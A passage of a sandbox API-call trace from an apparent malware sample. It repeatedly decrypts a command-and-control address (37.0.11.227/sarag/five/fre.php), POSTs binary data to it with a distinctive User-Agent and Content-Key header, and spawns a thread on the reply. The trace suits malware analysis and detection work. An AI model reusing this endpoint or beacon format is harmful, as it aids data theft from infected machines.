StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0231.494] GetProcessHeap () returned 0x690000 [0231.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0231.494] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0231.494] GetProcessHeap () returned 0x690000 [0231.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0231.494] socket (af=2, type=1, protocol=6) returned 0x600 [0231.496] connect (s=0x600, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0231.521] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0231.521] GetProcessHeap () returned 0x690000 [0231.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0231.521] GetProcessHeap () returned 0x690000 [0231.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0231.521] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.522] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0231.522] GetProcessHeap () returned 0x690000 [0231.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0231.522] GetProcessHeap () returned 0x690000 [0231.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.523] GetProcessHeap () returned 0x690000 [0231.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0231.523] GetProcessHeap () returned 0x690000 [0231.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0231.524] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.524] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0231.524] GetProcessHeap () returned 0x690000 [0231.524] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0231.524] GetProcessHeap () returned 0x690000 [0231.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.525] send (s=0x600, buf=0x6ab500*, len=242, flags=0) returned 242 [0231.525] send (s=0x600, buf=0x6aba40*, len=159, flags=0) returned 159 [0231.525] GetProcessHeap () returned 0x690000 [0231.525] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0231.525] recv (in: s=0x600, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0231.604] GetProcessHeap () returned 0x690000 [0231.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0231.604] GetProcessHeap () returned 0x690000 [0231.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0231.605] GetProcessHeap () returned 0x690000 [0231.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0231.605] GetProcessHeap () returned 0x690000 [0231.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0231.606] closesocket (s=0x600) returned 0 [0231.606] GetProcessHeap () returned 0x690000 [0231.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0231.606] GetProcessHeap () returned 0x690000 [0231.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0231.607] GetProcessHeap () returned 0x690000 [0231.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0231.608] GetProcessHeap () returned 0x690000 [0231.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0231.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc20) returned 0x600 [0231.610] Sleep (dwMilliseconds=0xea60) [0231.625] GetProcessHeap () returned 0x690000 [0231.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0231.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.626] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.632] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0231.666] GetProcessHeap () returned 0x690000 [0231.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0231.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.666] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0231.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.716] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.747] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.747] GetProcessHeap () returned 0x690000 [0231.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0231.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.749] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0231.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.750] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0231.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.750] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0231.750] GetProcessHeap () returned 0x690000 [0231.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0231.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.751] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.752] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.753] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.756] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.756] GetProcessHeap () returned 0x690000 [0231.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0231.756] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0231.756] GetProcessHeap () returned 0x690000 [0231.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0231.757] GetProcessHeap () returned 0x690000 [0231.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0231.757] GetProcessHeap () returned 0x690000 [0231.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0231.758] GetProcessHeap () returned 0x690000 [0231.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0231.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.759] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.763] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0231.769] GetProcessHeap () returned 0x690000 [0231.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0231.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.770] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0231.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.771] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.777] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.777] GetProcessHeap () returned 0x690000 [0231.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0231.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.779] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0231.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.779] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0231.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.780] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0231.780] GetProcessHeap () returned 0x690000 [0231.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0231.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.781] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0231.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.782] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0231.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.783] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0231.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.784] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0231.784] GetProcessHeap () returned 0x690000 [0231.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0231.784] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0231.784] GetProcessHeap () returned 0x690000 [0231.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0231.784] socket (af=2, type=1, protocol=6) returned 0x604 [0231.784] connect (s=0x604, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0231.811] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0231.811] GetProcessHeap () returned 0x690000 [0231.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0231.811] GetProcessHeap () returned 0x690000 [0231.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0231.812] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.813] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0231.814] GetProcessHeap () returned 0x690000 [0231.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0231.814] GetProcessHeap () returned 0x690000 [0231.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.814] GetProcessHeap () returned 0x690000 [0231.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0231.814] GetProcessHeap () returned 0x690000 [0231.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0231.815] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.816] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0231.816] GetProcessHeap () returned 0x690000 [0231.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0231.816] GetProcessHeap () returned 0x690000 [0231.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.816] send (s=0x604, buf=0x6ad508*, len=242, flags=0) returned 242 [0231.817] send (s=0x604, buf=0x6aba40*, len=159, flags=0) returned 159 [0231.817] GetProcessHeap () returned 0x690000 [0231.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0231.817] recv (in: s=0x604, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0231.891] GetProcessHeap () returned 0x690000 [0231.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0231.892] GetProcessHeap () returned 0x690000 [0231.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0231.893] GetProcessHeap () returned 0x690000 [0231.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0231.893] GetProcessHeap () returned 0x690000 [0231.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0231.893] closesocket (s=0x604) returned 0 [0231.895] GetProcessHeap () returned 0x690000 [0231.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0231.895] GetProcessHeap () returned 0x690000 [0231.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0231.896] GetProcessHeap () returned 0x690000 [0231.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0231.896] GetProcessHeap () returned 0x690000 [0231.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0231.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd18) returned 0x604 [0231.898] Sleep (dwMilliseconds=0xea60) [0231.900] GetProcessHeap () returned 0x690000 [0231.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0231.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.901] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.907] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0231.913] GetProcessHeap () returned 0x690000 [0231.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0231.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.914] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0231.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.915] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.916] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.916] GetProcessHeap () returned 0x690000 [0231.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0231.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.917] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0231.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.918] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0231.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.919] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0231.919] GetProcessHeap () returned 0x690000 [0231.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0231.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.920] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.921] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.922] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.923] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.923] GetProcessHeap () returned 0x690000 [0231.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0231.923] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0231.923] GetProcessHeap () returned 0x690000 [0231.924] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0231.924] GetProcessHeap () returned 0x690000 [0231.924] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0231.927] GetProcessHeap () returned 0x690000 [0231.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0231.927] GetProcessHeap () returned 0x690000 [0231.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0231.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.928] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.933] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0231.940] GetProcessHeap () returned 0x690000 [0231.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0231.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.941] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0231.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.942] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.943] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.943] GetProcessHeap () returned 0x690000 [0231.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0231.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.947] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0231.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.948] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0231.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0231.949] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0231.949] GetProcessHeap () returned 0x690000 [0231.949] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0231.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.950] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0231.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.952] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0231.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.953] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0231.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0231.954] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0231.954] GetProcessHeap () returned 0x690000 [0231.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0231.954] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0231.954] GetProcessHeap () returned 0x690000 [0231.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0231.954] socket (af=2, type=1, protocol=6) returned 0x608 [0231.954] connect (s=0x608, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0231.985] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0231.985] GetProcessHeap () returned 0x690000 [0231.985] 